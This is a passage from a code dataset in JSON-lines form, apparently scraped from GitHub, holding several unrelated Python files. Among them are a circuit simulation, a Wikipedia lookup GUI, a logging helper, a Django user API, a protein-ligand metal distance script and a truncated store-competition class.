"line_number": 37, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 38, "usage_type": "attribute"}, {"api_name": "logging.WARNING", "line_number": 39, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 40, "usage_type": "attribute"}, {"api_name": "logging.CRITICAL", "line_number": 41, "usage_type": "attribute"}, {"api_name": "logging.Formatter.__init__", "line_number": 68, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 68, "usage_type": "attribute"}, {"api_name": "six.iteritems", "line_number": 138, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 168, "usage_type": "call"}, {"api_name": "logging.Formatter.format", "line_number": 188, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 188, "usage_type": "attribute"}, {"api_name": "{'traceback': 'traceback'}.__REGEXES", "line_number": 195, "usage_type": "attribute"}, {"api_name": "{'traceback': 'traceback'}.KEYWORD_REGEX_FMT", "line_number": 197, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 199, "usage_type": "call"}, {"api_name": "{'traceback': 'traceback'}.__REGEXES", "line_number": 200, "usage_type": "attribute"}, {"api_name": "{'traceback': 'traceback'}.__STR_FORMATTER", "line_number": 209, "usage_type": "attribute"}, {"api_name": "string.Formatter", "line_number": 212, "usage_type": "call"}, {"api_name": "{'traceback': 'traceback', 'string': 'string'}.__STR_FORMATTER", "line_number": 213, "usage_type": "attribute"}, {"api_name": "re.escape", "line_number": 222, "usage_type": "call"}, {"api_name": "re.escape", "line_number": 223, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 228, "usage_type": "call"}, {"api_name": "six.string_types", "line_number": 280, "usage_type": "argument"}, {"api_name": "sys.version_info", "line_number": 342, "usage_type": "attribute"}, {"api_name": "six.binary_type", "line_number": 350, "usage_type": "argument"}, {"api_name": "six.string_types", "line_number": 358, "usage_type": "argument"}, {"api_name": "{'traceback': 'traceback', 'string': 'string'}.__encode", "line_number": 361, "usage_type": "call"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random'}.__stringify", "line_number": 370, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 374, "usage_type": "call"}, {"api_name": "time.time", "line_number": 376, "usage_type": "call"}, {"api_name": "time.time", "line_number": 385, "usage_type": "call"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random'}.__colors_foreground", "line_number": 408, "usage_type": "attribute"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random'}.__colors_foreground", "line_number": 411, "usage_type": "attribute"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random'}.__choose_color", "line_number": 412, "usage_type": "call"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random'}.__colors_background", "line_number": 420, "usage_type": "attribute"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random'}.__colors_background", "line_number": 423, "usage_type": "attribute"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random'}.__choose_color", "line_number": 424, "usage_type": "call"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random'}.__stringify", "line_number": 434, "usage_type": "call"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random'}.color_msg", "line_number": 444, "usage_type": "call"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random'}.color_fg", "line_number": 444, "usage_type": "call"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random'}.unpack", "line_number": 446, "usage_type": "call"}, {"api_name": "six.string_types", "line_number": 454, "usage_type": "argument"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random'}.__LARGE_TIME_UNITS", "line_number": 492, "usage_type": "attribute"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random'}.__SMALL_TIME_UNITS", "line_number": 494, "usage_type": "attribute"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random'}.unpack", "line_number": 503, "usage_type": "call"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random'}.__readable_time", "line_number": 503, "usage_type": "attribute"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random'}.__SIZE_UNITS", "line_number": 516, "usage_type": "attribute"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random'}.unpack", "line_number": 525, "usage_type": "call"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random'}.__readable_size", "line_number": 525, "usage_type": "attribute"}, {"api_name": "pprint.pformat", "line_number": 534, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 549, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 554, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 554, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 560, "usage_type": "call"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random', 'pprint': 'pprint', 'time': 'time'}.unpack", "line_number": 564, "usage_type": "call"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random', 'pprint': 'pprint', 'time': 'time'}.__strftime", "line_number": 564, "usage_type": "attribute"}, {"api_name": "{'traceback': 'traceback', 'string': 'string', 'random': 'random', 'pprint': 'pprint', 'time': 'time'}.unpack", "line_number": 577, "usage_type": "call"}]} +{"seq_id": "13706003513", "text": "import copy\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\nimport pandas as pd\n\n# Constants\nstart_time = time.time()\nC1 = 10 * 10 ** -3\nC2 = 20 * 10 ** -3\nL_max = 2\nL_min = 0.2\nI_min = 1\nI_max = 2\nR1 = 83\nR2 = 93\nR3 = 80\nUmax = 10\na = 0.004\nT = 2 * a\ndt = T / 400\n\nUc1_old = 1\ni2_old = 1\nUc2_old = 1\nUc1 = 1\ni2 = 1\nUc2 = 1\n\nn = 3\nvals_x = []\nuc1_vals_y = []\nul2_vals_x = []\nul2_vals_y = []\nI2_vals = []\nL2_vals = []\nuc2_vals_y = []\nu1_vals_y = []\nu2_vals_y = []\nt = 0\n\nA = np.array(\n [\n [1, I_min, I_min ** 2, I_min ** 3],\n [1, I_max, I_max ** 2, I_max ** 3],\n [0, 1, 2 * I_min, 3 * I_min ** 2],\n [0, 1, 2 * I_max, 3 * I_max ** 2]\n ])\nb = [L_max, L_min, 0, 0]\n\n\ndef U1(t):\n if t < a:\n return Umax / a * t\n elif a <= t < 2 * a:\n return -Umax / a * t + 10\n elif t == 2 * a:\n return 0\n else:\n return U1(t - T)\n\n\ndef U2():\n return i2 * R3\n\n\ndef _L2(i2):\n if abs(i2) <= I_min:\n return L_max\n if abs(i2) >= I_max:\n return L_min\n a = gauss()\n return a[0] + a[1] * abs(i2) + a[2] * i2 ** 2 + a[3] * abs(i2 ** 3)\n\n\ndef gauss():\n n1 = 4\n B = [L_max, L_min, 0, 0]\n\n x = 0\n v = copy.deepcopy(A)\n p = copy.deepcopy(B)\n y = [0 for _ in range(len(A))]\n c = [[0 for _ in range(n1)] for _ in range(n1)]\n\n for k in range(n1):\n # Column sort\n m = v[k][k]\n w = k\n for l in range(k + 1, n1):\n if m < abs(v[l][k]):\n m = abs(v[l][k])\n w = l\n p[k], p[w] = p[w], p[k]\n for d in range(n1):\n v[k][d], v[w][d] = v[w][d], v[k][d]\n\n if v[k][k] != 0:\n y[k] = p[k] / v[k][k]\n else:\n y[k] = p[k]\n for i in range(k + 1, n1):\n p[i] -= v[i][k] * y[k]\n for j in range(k + 1, n1):\n c[k][j] = v[k][j] / v[k][k]\n v[i][j] -= v[i][k] * c[k][j]\n\n x = copy.deepcopy(y)\n for i in range(n1 - 1, -1, -1):\n s = 0\n for j in range(i + 1, n1):\n s += c[i][j] * x[j]\n x[i] = y[i] - s\n return x\n\n\ndef F(t, Uc1, i2, Uc2):\n fun = (U1(t) - Uc2) / C1\n return fun\n\n\ndef G(t, Uc1, i2, Uc2):\n fun = (Uc2 - i2 * (R2 + R3)) / _L2(i2)\n return fun\n\n\ndef H(t, Uc1, i2, Uc2):\n fun = ((U1(t) - Uc2) / C2) - i2\n return fun\n\n\ndef draw(vals_x, vals_y, title, xlabel, ylabel):\n vals_x = np.array(vals_x)\n vals_y = np.array(vals_y)\n plt.title(title, fontdict={'family': 'serif', 'color': 'darkred', 'size': 18})\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.axhline(y=0, color=\"black\")\n plt.axvline(x=0, color=\"black\")\n plt.plot(vals_x, vals_y, 'g')\n plt.show()\n\n\nif __name__ == '__main__':\n while t <= 20 * T:\n K1 = dt * F(t, Uc1_old, i2_old, Uc2_old)\n L1 = dt * G(t, Uc1_old, i2_old, Uc2_old)\n M1 = dt * H(t, Uc1_old, i2_old, Uc2_old)\n K2 = dt * F(t + (dt / 3), Uc1_old + (K1 / 3), i2_old + (L1 / 3), Uc2_old + (M1 / 3))\n L2 = dt * G(t + (dt / 3), Uc1_old + (K1 / 3), i2_old + (L1 / 3), Uc2_old + (M1 / 3))\n M2 = dt * H(t + (dt / 3), Uc1_old + (K1 / 3), i2_old + (L1 / 3), Uc2_old + (M1 / 3))\n K3 = dt * F(t + dt * (2 / 3), Uc1_old + K2 * (2 / 3), i2_old + L2 * (2 / 3), Uc2_old + M2 * (2 / 3))\n L3 = dt * G(t + dt * (2 / 3), Uc1_old + K2 * (2 / 3), i2_old + L2 * (2 / 3), Uc2_old + M2 * (2 / 3))\n M3 = dt * H(t + dt * (2 / 3), Uc1_old + K2 * (2 / 3), i2_old + L2 * (2 / 3), Uc2_old + M2 * (2 / 3))\n Uc1 = Uc1_old + (K1 + 3 * K3) / 4\n i2 = i2_old + (L1 + 3 * L3) / 4\n Uc2 = Uc2_old + (M1 + 3 * M3) / 4\n\n vals_x.append(t)\n uc1_vals_y.append(Uc1)\n uc2_vals_y.append(Uc2)\n ul2_vals_y.append(i2)\n u1_vals_y.append(U1(t))\n u2_vals_y.append(U2())\n Uc1_old = Uc1\n i2_old = i2\n Uc2_old = Uc2\n\n t += dt\n i = 0\n while i <= I_max + 1:\n I2_vals.append(i)\n L2_vals.append(_L2(i))\n i += dt\n\n df = pd.DataFrame({\n \"t\": vals_x,\n \"Вхідна напруга U1\": u1_vals_y,\n \"Вихідна напруга U2\": u2_vals_y,\n \"Напруга на С1\": uc1_vals_y,\n \"Напруга на L2\": ul2_vals_y,\n \"Напруга на С2\": uc2_vals_y,\n \"Час виконання\": (time.time() - start_time)\n })\n np.savetxt(\"result.dat\", df, fmt=\"%f\", header=\" T U1 U2 Uc1 Ul2 Uc2 Runtime\", comments=\"\")\n\n draw(I2_vals, L2_vals, \"L2(i2)\", \"i, А\", \"L, Гн\")\n draw(vals_x, uc1_vals_y, \"UС1\", \"t, сек\", \"U, В\")\n draw(vals_x, ul2_vals_y, \"UL2\", \"t, сек\", \"U, В\")\n draw(vals_x, uc2_vals_y, \"UС2\", \"t, сек\", \"U, В\")\n draw(vals_x, u1_vals_y, \"U1\", \"t, сек\", \"U, В\")\n draw(vals_x, u2_vals_y, \"U2\", \"t, сек\", \"U, В\")\n", "repo_name": "MKruchok/Numerical_methods", "sub_path": "lab6 (complex RCL approximation).py", "file_name": "lab6 (complex RCL approximation).py", "file_ext": "py", "file_size_in_byte": 4893, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "time.time", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 42, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 81, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 82, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 136, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 136, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 137, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 137, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axhline", "line_number": 138, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 138, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 139, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 139, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 140, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 141, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 141, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 176, "usage_type": "call"}, {"api_name": "time.time", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 185, "usage_type": "call"}]} +{"seq_id": "5855604349", "text": "import tkinter\nimport ttkbootstrap as ttk\nimport wikipedia\n\n\nwindow = ttk.Window(themename=\"darkly\")\nwindow.geometry(\"500x500\")\nwindow.title(\"Information Getter.\")\n\nsearch_input = ttk.Entry(window, font=(\"Arial\", 12))\nsearch_input.pack(pady=5)\n\n\ndef change_info():\n try:\n summary = wikipedia.summary(search_input.get(), sentences=2, auto_suggest=False)\n information_box.config(text=summary)\n except wikipedia.exceptions.PageError:\n information_box.config(text=\"Couldn't find info.\")\n except wikipedia.exceptions.DisambiguationError:\n information_box.config(text=\"Please be more specific.\")\n except Exception as e:\n information_box.config(text=f\"An unknown error occurred. {e}\")\n\n\nget_info_button = ttk.Button(window, text=\"Get info!\", command=change_info)\nget_info_button.pack(pady=5)\n\ninformation_box = ttk.Label(window, text=\"Enter a class to get information.\", wraplength=470, font=(\"Arial\", 13))\ninformation_box.pack(pady=5)\n\nwikipedia_credit = ttk.Label(window, text=\"Summaries taken from Wikipedia.\", font=(\"Arial\", 10))\nwikipedia_credit.pack()\nwikipedia_credit.place(relx=0.5, rely=0.95, anchor=\"center\")\n\ntkinter.mainloop()\n", "repo_name": "runes121/Quick-Info-Getter", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1179, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "ttkbootstrap.Window", "line_number": 6, "usage_type": "call"}, {"api_name": "ttkbootstrap.Entry", "line_number": 10, "usage_type": "call"}, {"api_name": "wikipedia.summary", "line_number": 16, "usage_type": "call"}, {"api_name": "wikipedia.exceptions", "line_number": 18, "usage_type": "attribute"}, {"api_name": "wikipedia.exceptions", "line_number": 20, "usage_type": "attribute"}, {"api_name": "ttkbootstrap.Button", "line_number": 26, "usage_type": "call"}, {"api_name": "ttkbootstrap.Label", "line_number": 29, "usage_type": "call"}, {"api_name": "ttkbootstrap.Label", "line_number": 32, "usage_type": "call"}, {"api_name": "tkinter.mainloop", "line_number": 36, "usage_type": "call"}]} +{"seq_id": "72058239874", "text": "import logging\nimport os\nfrom logging.handlers import RotatingFileHandler\n\nparent_logger = logging.getLogger(\"discord\")\nparent_logger.setLevel(logging.INFO)\nhandler = RotatingFileHandler(\n filename=\"logs/ceres.log\",\n encoding='utf-8',\n mode='a',\n maxBytes=1024000,\n backupCount=5\n)\nhandler.setFormatter(\n logging.Formatter(\n fmt='[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S'\n )\n)\nparent_logger.addHandler(handler)\n\n\ndef get_logger(name):\n \"\"\"\n Takes the name of the file and generates a child logger of the discord logger to be used by the file to log\n events to the discord logger.\n The logging level is determined by the parent logger (the discord logger in this case).\n :param name: Should always be passed via __name__\n :return: a logger object.\n \"\"\"\n\n levels = {\n \"CRITICAL\": logging.CRITICAL,\n \"ERROR\": logging.ERROR,\n \"WARNING\": logging.WARNING,\n \"INFO\": logging.INFO,\n \"DEBUG\": logging.DEBUG,\n \"NOTSET\": logging.NOTSET\n }\n\n logger = logging.getLogger('discord.' + name)\n logger.name = name\n logger.level = levels[os.getenv(\"LOG_LEVEL\", \"INFO\")]\n\n return logger\n", "repo_name": "colcrunch/ceres", "sub_path": "utils/loggers.py", "file_name": "loggers.py", "file_ext": "py", "file_size_in_byte": 1233, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 5, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 6, "usage_type": "attribute"}, {"api_name": "logging.handlers.RotatingFileHandler", "line_number": 7, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 15, "usage_type": "call"}, {"api_name": "logging.CRITICAL", "line_number": 33, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 34, "usage_type": "attribute"}, {"api_name": "logging.WARNING", "line_number": 35, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 36, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 37, "usage_type": "attribute"}, {"api_name": "logging.NOTSET", "line_number": 38, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 41, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "496661609", "text": "from ninja import Router\n\nfrom subscription.models import UserSubscription, Subscription\nfrom . import schema\nfrom user.models import User\n\n\nuser_router = Router(tags=[\"사용자 API\"])\n\n# 유저 정보 가져오기\n@user_router.get(\n '/like/',\n response={200: schema.UserLikeSchema},\n summary=\"사용자 좋아요 목록\",\n)\ndef get_user(request):\n '''\n 사용자 좋아요 목록입니다.\n\n 데이터는 like_list에 담겨 있습니다.\n '''\n\n user_subscriptions = UserSubscription.objects.filter(user_id=request.auth.id)\n\n like_list = []\n\n if len(user_subscriptions) != 0:\n for user_subscription in user_subscriptions:\n subscription = Subscription.objects.get(id=user_subscription.user_subscription_id)\n like_num = len(UserSubscription.objects.filter(user_subscription_id=subscription.id))\n subscription.like_num = like_num\n like_list.append(subscription)\n\n return 200, {'like_list':like_list}\n\n# 사용자 정보 수정\n@user_router.patch(\n '/',\n response={201: None},\n summary='사용자 정보 수정'\n)\ndef edit_user(request, data: schema.UserSchema):\n '''\n 사용자 정부 수정 API입니다.\n\n first_name: str -> 사용자 이름\n last_name: str -> 사용자 성\n email: str -> 사용자 이메일\n\n 데이터 정규식 체크해서 보내주시기 바랍니다.\n 데이터 값이 바뀌지 않을 경우 원본 데이터를 넣어서 보내주시기 바랍니다.\n '''\n user_email = data.email\n user_first_name = data.first_name\n user_last_name = data.last_name\n\n user_info = User.objects.get(id=request.auth.id)\n\n user_info.email = user_email\n user_info.first_name = user_first_name\n user_info.last_name = user_last_name\n user_info.save()\n\n return 201\n", "repo_name": "subscriptionRescueTeam/save-my-youth", "sub_path": "backend/user/api.py", "file_name": "api.py", "file_ext": "py", "file_size_in_byte": 1811, "program_lang": "python", "lang": "ko", "doc_type": "code", "stars": 55, "dataset": "github-code", "pt": "61", "api": [{"api_name": "ninja.Router", "line_number": 8, "usage_type": "call"}, {"api_name": "subscription.models.UserSubscription.objects.filter", "line_number": 23, "usage_type": "call"}, {"api_name": "subscription.models.UserSubscription.objects", "line_number": 23, "usage_type": "attribute"}, {"api_name": "subscription.models.UserSubscription", "line_number": 23, "usage_type": "name"}, {"api_name": "subscription.models", "line_number": 29, "usage_type": "name"}, {"api_name": "subscription.models.Subscription.objects.get", "line_number": 29, "usage_type": "call"}, {"api_name": "subscription.models.Subscription.objects", "line_number": 29, "usage_type": "attribute"}, {"api_name": "subscription.models.Subscription", "line_number": 29, "usage_type": "name"}, {"api_name": "subscription.models.UserSubscription.objects.filter", "line_number": 30, "usage_type": "call"}, {"api_name": "subscription.models.UserSubscription.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "subscription.models.UserSubscription", "line_number": 30, "usage_type": "name"}, {"api_name": "subscription.models.id", "line_number": 30, "usage_type": "attribute"}, {"api_name": "subscription.models", "line_number": 30, "usage_type": "name"}, {"api_name": "subscription.models.like_num", "line_number": 31, "usage_type": "attribute"}, {"api_name": "subscription.models", "line_number": 31, "usage_type": "name"}, {"api_name": "subscription.models", "line_number": 32, "usage_type": "argument"}, {"api_name": "user.models.User.objects.get", "line_number": 57, "usage_type": "call"}, {"api_name": "user.models.User.objects", "line_number": 57, "usage_type": "attribute"}, {"api_name": "user.models.User", "line_number": 57, "usage_type": "name"}]} +{"seq_id": "1534323855", "text": "'''\nGet the hasMetals dataset.\n\nUsage: getHasMetals.py \n\nExample 1: python3 fisherAnalysis/code/getHasMetals.py results/standalone_01-04-22.txt results/standalone_adp_01-04-22 ADP fisherAnalysis/results/hasMetalsMg.txt MG globalData/structFiles_adp_07-22-22\n\nExample 2: python3 fisherAnalysis/code/getHasMetals.py results/standalone_01-04-22.txt results/standalone_adp_01-04-22 ADP fisherAnalysis/results/hasMetalsTopSix.txt ZN,MG,CA,FE,NA,MN globalData/structFiles_adp_07-22-22\n\nExample 3: python3 fisherAnalysis/code/getHasMetals.py results/standalone_01-04-22.txt results/standalone_adp_01-04-22 ADP fisherAnalysis/results/hasMetalsAll.txt ZN,MG,CA,FE,NA,MN,K,CU,NI,CO,CD,HG,PT,MO,AL,V,BA,SR,RU,CS,W,YB,AU,Y,LI,PB,GD,TL,RB,SM,IR,PR,RH,EU,PD,AG,OS,LU,HO,TB,CR,GA,LA,SB,CE,ER,IN,BI,DY,BE,ZR,SN,HF,TA,RE,PA,U globalData/structFiles_adp_07-22-22\n'''\n\n\nimport sys\nimport Bio.PDB as bioPDB\nimport numpy as np\nimport json\nimport os\n\n\n# pdbFolderPath = 'globalData/structFiles_01-04-22/'\n\n\ndef main(pdbIDFilePath: str, discrepDirPath: str, ligandName:str, resultFilePath: str, metalNameList: list, structFileDirPath:str) -> None:\n \"\"\"\n :param pdbIDFilePath: path to text file of PDB IDs\n :param discrepDirPath: path to directory of discrepancy data\n :param ligandName: name of the ligand to search for\n :param resultFilePath: path to the text file in which to record the final dataset\n :param metalNameList: list of metals to collect\n :param structFileDirPath: path to the directory containing the struct files for the ligand dataset\n \"\"\"\n # print('entered main')\n discrepDict = getDiscrepDict(discrepDirPath)\n # print('got discrepDict')\n \n discrepDict = getMetalDists(discrepDict, metalNameList, ligandName, pdbIDFilePath, structFileDirPath)\n # print('got metal dists')\n\n resultList = []\n for ((pdbID, _, _, _, _), residueDict) in discrepDict.items():\n absDiscrep = residueDict['num_electrons_actual_abs_significant_regional_discrepancy']\n nonabsDiscrep = residueDict['num_electrons_actual_significant_regional_discrepancy']\n\n # print('got discreps')\n if 'metalDist' in residueDict.keys():\n # print('has metalDist')\n metalDist = residueDict['metalDist']\n\n # NOTE: strictly for debugging\n assert(metalDist < sys.maxsize)\n\n finalData = ','.join(str(val) for val in [pdbID, absDiscrep, nonabsDiscrep, metalDist])\n\n resultList.append(finalData)\n \n # print('resultList len', len(resultList))\n with open(resultFilePath, 'w') as resultFile, \\\n open(pdbIDFilePath, 'r') as pdbIDFile:\n resultFile.write('\\n'.join(resultList))\n\n # NOTE: The following lines in this with block are just a sanity check.\n print('num of residues:', len(resultList))\n numEntries = len([entryName for entryName in pdbIDFile])\n print('num of entries:', numEntries)\n\n print('Finished running!')\n\n\ndef getInitDist(metalList, atomList):\n '''\n Get the initial metal distance to use as the initial value for minDist in getResDictList.\n\n :param metalList: list of metals\n :param atomList: list of atoms\n '''\n for metal in metalList:\n distList = [np.linalg.norm(atom.coord - metal.coord) for atom in atomList if not np.array_equal(atom.coord, metal.coord)]\n\n if(len(distList) > 0):\n return np.min(distList)\n return sys.maxsize\n\n\ndef getMetalDists(discrepDict:dict, metalNameList: list, ligandName:str, pdbIDFilePath: str, structFileDirPath:str) -> dict:\n '''\n Add metal contact distances to the residues in discrepDict.\n\n :param discrepDict: dictionary of residues paired with basic info about them along with discrepancy data\n :param metalNameList: list of names of metals\n :param ligandName: name of the ligand to search for\n :param pdbIDFilePath: path to the file containing the list of PDB IDs\n :param structFileDirPath: path to the directory containing the struct files for the ligand dataset\n '''\n\n with open(pdbIDFilePath, 'r') as pdbIDFile:\n pdbIDList = [line.rstrip('\\n') for line in pdbIDFile]\n for pdbid in pdbIDList:\n pdbID = pdbid.lower()\n structFilePath = structFileDirPath + 'pdb' + pdbID + '.ent'\n\n if os.path.isfile(structFilePath):\n parser = bioPDB.PDBParser(QUIET=True)\n bioPDBObj = parser.get_structure(pdbID, structFilePath)\n \n atomList = list(bioPDBObj.get_atoms())\n metalList = [atom for atom in atomList if atom.element in metalNameList]\n resList = list(bioPDBObj.get_residues())\n ligandResList = [res for res in resList if res.resname == ligandName]\n\n # print('ligand name', ligandName)\n # print('ligandResList len', len(ligandResList))\n\n for res in ligandResList:\n resID = (pdbID, res.parent.parent.id, res.parent.id, res.resname, res.id[1])\n # print('modelID type', type(res.parent.parent.id))\n\n if resID in discrepDict.keys():\n # print('has resID')\n ligandAtomList = list(res.get_atoms())\n\n # # NOTE: This is just an initial value for minDist.\n # minDist = getInitDist(metalList, ligandAtomList)\n\n distList = [np.linalg.norm(atom.coord - metal.coord) for atom in ligandAtomList for metal in metalList if not np.array_equal(atom.coord, metal.coord)]\n\n minDist = np.min(distList) if len(distList) > 0 else sys.maxsize\n\n # If there is a minimum distance\n if minDist < sys.maxsize:\n # print('has metalDist')\n discrepDict[resID]['metalDist'] = minDist\n \n else:\n print('no struct file for ' + pdbID)\n \n return discrepDict\n\n\ndef getDiscrepDict(discrepDirPath: str) -> dict:\n '''\n Return the discrepancy data referenced at discrepDirPath as a dictionary of residue dictionaries.\n\n :param discrepDirPath: path to the directory containing the discrepancy data\n '''\n discrepDict = dict()\n with os.scandir(discrepDirPath) as discrepDir:\n for dirEntry in discrepDir:\n with open(dirEntry, 'r') as discrepFile:\n # Recall that each discrepFile represents the discrepancy data for a unique PDB entry. So really, we are iterating over each PDB entry's dicsrepancy data.\n residueList = json.load(discrepFile)\n\n # print('residueLIst len', len(residueList))\n\n for residueDict in residueList:\n # NOTE: change the key \"pdbid\" to \"PDB ID\" if you are collecting data for standalone_atp_01-04-22\n modelID = '1' if 'model' not in residueDict.keys() else residueDict['model']\n residueID = (residueDict['pdbid'], modelID, residueDict['chain'], residueDict['residue_name'], residueDict['residue_number'])\n \n # print(f\"discrepDict residueID: %s\" % (residueID,))\n\n discrepDict[residueID] = residueDict\n return discrepDict\n\n\nif __name__ == '__main__':\n try:\n _, pdbIDFilePath, discrepDirPath, ligandName, resultFilePath, metalNameList, structFileDirPath = sys.argv\n # print('got argv')\n main(pdbIDFilePath, discrepDirPath, ligandName, resultFilePath, metalNameList.split(','), structFileDirPath)\n except AssertionError:\n raise\n except Exception as e:\n raise\n # print('got here error')\n # print(e)\n # print(__doc__)\n\n", "repo_name": "alanyluo/LigandDensityAnalysisIntern", "sub_path": "FisherAnalysis/Code/getHasMetals.py", "file_name": "getHasMetals.py", "file_ext": "py", "file_size_in_byte": 7850, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.maxsize", "line_number": 51, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 78, "usage_type": "attribute"}, {"api_name": "numpy.array_equal", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 81, "usage_type": "call"}, {"api_name": "sys.maxsize", "line_number": 82, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 102, "usage_type": "call"}, {"api_name": "os.path", "line_number": 102, "usage_type": "attribute"}, {"api_name": "Bio.PDB.PDBParser", "line_number": 103, "usage_type": "call"}, {"api_name": "Bio.PDB", "line_number": 103, "usage_type": "name"}, {"api_name": "numpy.linalg.norm", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 125, "usage_type": "attribute"}, {"api_name": "numpy.array_equal", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 127, "usage_type": "call"}, {"api_name": "sys.maxsize", "line_number": 127, "usage_type": "attribute"}, {"api_name": "sys.maxsize", "line_number": 130, "usage_type": "attribute"}, {"api_name": "os.scandir", "line_number": 147, "usage_type": "call"}, {"api_name": "json.load", "line_number": 151, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 168, "usage_type": "attribute"}]} +{"seq_id": "34739753729", "text": "from datetime import datetime\nfrom geoprocessing.business_logic.business_objects.store import Store\nfrom common.utilities.inversion_of_control import Dependency\nfrom common.utilities.signal_math import SignalDecimal\n\n__author__ = 'erezrubinstein'\n\nclass StoreCompetitionInstance(object):\n \"\"\"\n This class is for defining an away store instance.\n It is not a pure representation of a store object, but rather a \"view\" representation that combines other properties\n \"\"\"\n def __init__(self):\n self.home_store_id = None\n self.away_store_id = None\n self.company_id = None\n self.latitude = None\n self.longitude = None\n self.competitive_company_id = None\n self.travel_time = None\n self.trade_area_id = None\n self.competitive_store_id = None\n self.competitive_companies_assumed_start_date = None\n self.competitive_companies_assumed_end_date = None\n self.competitive_weight = None\n self.company_name = None\n self.street_number = None\n self.street = None\n self.city = None\n self.state = None\n self.zip_code = None\n\n # these are protected members. they should be accessed by their properties below\n self._opened_date = None\n self._closed_date = None\n self._assumed_opened_date = None\n self._assumed_closed_date = None\n\n\n ####################################################### Properties #######################################################################\n\n # this is a business property representing the open_date that we should associate with this object\n @property\n def opened_date(self):\n if self._opened_date is not None and self._opened_date != datetime(1900, 1, 1) and self._opened_date != 